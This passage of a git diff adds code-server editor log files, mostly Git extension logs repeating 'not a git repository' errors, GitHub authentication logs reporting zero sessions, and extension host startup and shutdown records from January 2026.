/opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:15:28.562 [info] > git rev-parse --show-toplevel [3ms] +2026-01-27 22:15:28.562 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:19:18.849 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 22:19:18.849 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:19:30.178 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 22:19:30.178 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:19:39.742 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 22:19:39.742 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:39:33.367 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 22:39:33.367 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:40:07.258 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 22:40:07.258 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:40:13.185 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 22:40:13.185 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:40:19.534 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 22:40:19.534 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:40:50.032 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 22:40:50.032 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:44:57.430 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 22:44:57.430 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:45:31.470 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 22:45:31.470 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:47:27.662 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 22:47:27.662 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:50:54.817 [info] > git rev-parse --show-toplevel [4ms] +2026-01-27 22:50:54.817 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:51:09.577 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 22:51:09.577 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 22:52:31.918 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 22:52:31.918 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:06:39.824 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:06:39.825 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:06:40.787 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:06:40.787 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:07:52.198 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:07:52.198 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:07:52.712 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:07:52.712 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:12:57.141 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:12:57.142 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:15:46.537 [info] > git rev-parse --show-toplevel [4ms] +2026-01-27 23:15:46.537 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:19:45.232 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 23:19:45.232 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:20:25.881 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:20:25.881 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:21:32.296 [info] > git rev-parse --show-toplevel [4ms] +2026-01-27 23:21:32.296 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:23:37.743 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:23:37.743 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:23:47.703 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:23:47.703 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:27:11.840 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:27:11.840 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:27:27.245 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:27:27.245 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:27:28.146 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:27:28.146 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:27:59.809 [info] > git rev-parse --show-toplevel [3ms] +2026-01-27 23:27:59.809 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:29:30.733 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:29:30.733 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:32:15.629 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 23:32:15.629 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:32:34.911 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:32:34.911 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:32:35.680 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:32:35.680 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:32:40.998 [info] > git rev-parse --show-toplevel [3ms] +2026-01-27 23:32:40.998 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:33:06.183 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:33:06.183 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:33:17.614 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:33:17.614 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:37:07.937 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:37:07.937 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:37:16.333 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:37:16.333 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:37:16.963 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:37:16.963 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:37:48.311 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 23:37:48.311 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:37:58.662 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 23:37:58.662 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:45:46.325 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:45:46.325 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:45:56.532 [info] > git rev-parse --show-toplevel [2ms] +2026-01-27 23:45:56.532 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:48:13.681 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:48:13.681 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:48:27.933 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:48:27.933 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:48:28.364 [info] > git rev-parse --show-toplevel [3ms] +2026-01-27 23:48:28.364 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:50:18.621 [info] > git rev-parse --show-toplevel [3ms] +2026-01-27 23:50:18.621 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:51:31.459 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:51:31.459 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-27 23:52:12.178 [info] > git rev-parse --show-toplevel [1ms] +2026-01-27 23:52:12.178 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..a19e2b1 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-27 22:09:48.157 [info] Reading sessions from keychain... +2026-01-27 22:09:48.157 [info] Getting sessions for all scopes... +2026-01-27 22:09:48.157 [info] Got 0 sessions for ... +2026-01-27 22:09:48.157 [info] Getting sessions for all scopes... +2026-01-27 22:09:48.157 [info] Got 0 sessions for ... +2026-01-27 22:09:48.157 [info] Getting sessions for all scopes... +2026-01-27 22:09:48.157 [info] Got 0 sessions for ... +2026-01-27 22:09:48.157 [info] Getting sessions for all scopes... +2026-01-27 22:09:48.157 [info] Got 0 sessions for ... +2026-01-27 22:09:48.157 [info] Getting sessions for all scopes... +2026-01-27 22:09:48.157 [info] Got 0 sessions for ... +2026-01-27 22:09:48.157 [info] Getting sessions for all scopes... +2026-01-27 22:09:48.157 [info] Got 0 sessions for ... +2026-01-27 22:09:48.157 [info] Getting sessions for all scopes... +2026-01-27 22:09:48.157 [info] Got 0 sessions for ... +2026-01-27 22:09:48.157 [info] Getting sessions for all scopes... +2026-01-27 22:09:48.157 [info] Got 0 sessions for ... +2026-01-27 22:09:48.157 [info] Getting sessions for all scopes... +2026-01-27 22:09:48.157 [info] Got 0 sessions for ... +2026-01-27 22:09:48.211 [info] Getting sessions for all scopes... +2026-01-27 22:09:48.211 [info] Got 0 sessions for ... +2026-01-27 22:09:48.255 [info] Getting sessions for all scopes... +2026-01-27 22:09:48.256 [info] Got 0 sessions for ... +2026-01-27 22:09:48.256 [info] Getting sessions for all scopes... +2026-01-27 22:09:48.256 [info] Got 0 sessions for ... +2026-01-27 22:09:48.256 [info] Getting sessions for all scopes... +2026-01-27 22:09:48.256 [info] Got 0 sessions for ... +2026-01-27 22:09:48.256 [info] Getting sessions for all scopes... +2026-01-27 22:09:48.256 [info] Got 0 sessions for ... +2026-01-27 22:09:48.256 [info] Getting sessions for all scopes... +2026-01-27 22:09:48.256 [info] Got 0 sessions for ... +2026-01-27 22:09:49.818 [info] Getting sessions for all scopes... +2026-01-27 22:09:49.818 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/vscode.github/GitHub.log new file mode 100755 index 0000000..94cfc03 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-27 22:09:48.322 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/remoteexthost.log new file mode 100755 index 0000000..ccfc468 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/remoteexthost.log @@ -0,0 +1,15 @@ +2026-01-28 07:50:39.785 [info] Extension host with pid 152964 started +2026-01-28 07:50:39.788 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/3d7c237e/vscode.lock': Lock acquired. +2026-01-28 07:50:40.017 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-28 07:50:40.018 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-28 07:50:40.207 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-28 07:50:40.274 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-28 07:50:40.275 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-28 07:50:40.637 [info] Eager extensions activated +2026-01-28 07:50:40.638 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-28 07:50:40.638 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-28 07:50:46.374 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-28 08:01:31.112 [info] ExtensionService#_doActivateExtension vscode.npm, startup: false, activationEvent: 'onTerminalQuickFixRequest:ms-vscode.npm-command' +2026-01-28 13:31:24.874 [info] Extension host terminating: received terminate message from renderer +2026-01-28 13:31:24.875 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/3d7c237e/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-28 13:31:24.905 [info] Extension host with pid 152964 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/vscode.git/Git.log new file mode 100755 index 0000000..e8120eb --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/vscode.git/Git.log @@ -0,0 +1,86 @@ +2026-01-28 07:50:40.708 [info] [main] Log level: Info +2026-01-28 07:50:40.708 [info] [main] Validating found git in: "git" +2026-01-28 07:50:40.708 [info] [main] Using git "2.39.5" from "git" +2026-01-28 07:50:40.708 [info] [Model][doInitialScan] Initial repository scan started +2026-01-28 07:50:40.708 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 07:50:40.708 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 07:50:40.708 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 07:50:40.708 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 07:50:40.708 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 07:50:40.708 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 07:50:40.708 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 07:50:40.708 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 07:50:40.708 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 07:50:40.708 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 07:50:40.708 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 07:50:40.708 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 07:50:40.708 [info] > git rev-parse --show-toplevel [6ms] +2026-01-28 07:50:40.708 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 07:50:40.708 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 07:50:40.708 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 07:50:40.708 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 07:50:40.708 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 07:50:40.709 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 07:50:40.709 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 07:50:40.713 [info] > git rev-parse --show-toplevel [2ms] +2026-01-28 07:50:40.713 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 07:50:40.716 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 07:50:40.716 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 07:50:40.720 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 07:50:40.720 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 07:50:40.723 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 07:50:40.723 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 07:50:40.726 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-28 07:50:40.730 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 07:50:40.730 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 07:50:41.454 [info] > git rev-parse --show-toplevel [3ms] +2026-01-28 07:50:41.454 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 07:50:41.666 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 07:50:41.666 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 07:50:41.669 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 07:50:41.670 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 07:50:42.297 [info] > git rev-parse --show-toplevel [4ms] +2026-01-28 07:50:42.297 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 07:50:45.543 [info] > git rev-parse --show-toplevel [3ms] +2026-01-28 07:50:45.543 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 07:50:46.813 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 07:50:46.813 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 08:06:21.622 [info] > git rev-parse --show-toplevel [3ms] +2026-01-28 08:06:21.622 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 08:15:19.135 [info] > git rev-parse --show-toplevel [5ms] +2026-01-28 08:15:19.135 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 08:15:24.706 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 08:15:24.707 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 08:25:45.967 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 08:25:45.967 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 08:25:46.535 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 08:25:46.535 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-28 08:25:47.374 [info] > git rev-parse --show-toplevel [1ms] +2026-01-28 08:25:47.374 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..a242b0b --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-28 07:50:40.381 [info] Reading sessions from keychain... +2026-01-28 07:50:40.381 [info] Getting sessions for all scopes... +2026-01-28 07:50:40.381 [info] Got 0 sessions for ... +2026-01-28 07:50:40.381 [info] Getting sessions for all scopes... +2026-01-28 07:50:40.381 [info] Got 0 sessions for ... +2026-01-28 07:50:40.381 [info] Getting sessions for all scopes... +2026-01-28 07:50:40.381 [info] Got 0 sessions for ... +2026-01-28 07:50:40.381 [info] Getting sessions for all scopes... +2026-01-28 07:50:40.381 [info] Got 0 sessions for ... +2026-01-28 07:50:40.575 [info] Getting sessions for all scopes... +2026-01-28 07:50:40.575 [info] Got 0 sessions for ... +2026-01-28 07:50:41.042 [info] Getting sessions for all scopes... +2026-01-28 07:50:41.042 [info] Got 0 sessions for ... +2026-01-28 07:50:41.042 [info] Getting sessions for all scopes... +2026-01-28 07:50:41.042 [info] Got 0 sessions for ... +2026-01-28 07:50:41.042 [info] Getting sessions for all scopes... +2026-01-28 07:50:41.042 [info] Got 0 sessions for ... +2026-01-28 07:50:41.042 [info] Getting sessions for all scopes... +2026-01-28 07:50:41.043 [info] Got 0 sessions for ... +2026-01-28 07:50:41.043 [info] Getting sessions for all scopes... +2026-01-28 07:50:41.043 [info] Got 0 sessions for ... +2026-01-28 07:50:41.065 [info] Getting sessions for all scopes... +2026-01-28 07:50:41.065 [info] Got 0 sessions for ... +2026-01-28 07:50:41.065 [info] Getting sessions for all scopes... +2026-01-28 07:50:41.065 [info] Got 0 sessions for ... +2026-01-28 07:50:41.066 [info] Getting sessions for all scopes... +2026-01-28 07:50:41.066 [info] Got 0 sessions for ... +2026-01-28 07:50:41.066 [info] Getting sessions for all scopes... +2026-01-28 07:50:41.066 [info] Got 0 sessions for ... +2026-01-28 07:50:41.066 [info] Getting sessions for all scopes... +2026-01-28 07:50:41.066 [info] Got 0 sessions for ... +2026-01-28 07:50:42.344 [info] Getting sessions for all scopes... +2026-01-28 07:50:42.344 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/vscode.github/GitHub.log new file mode 100755 index 0000000..759dae6 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-28 07:50:40.709 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/remoteexthost.log new file mode 100755 index 0000000..637c75f --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/remoteexthost.log @@ -0,0 +1,11 @@ +2026-01-28 19:56:58.378 [info] Extension host with pid 218766 started +2026-01-28 19:56:58.386 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Lock acquired. +2026-01-28 19:56:58.479 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-28 19:56:58.479 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-28 19:56:58.608 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-28 19:56:58.651 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-28 19:56:58.651 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-28 19:56:58.807 [info] Eager extensions activated +2026-01-28 19:56:58.807 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-28 19:56:58.807 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-28 19:56:59.220 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/vscode.git/Git.log new file mode 100755 index 0000000..f100aa3 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/vscode.git/Git.log @@ 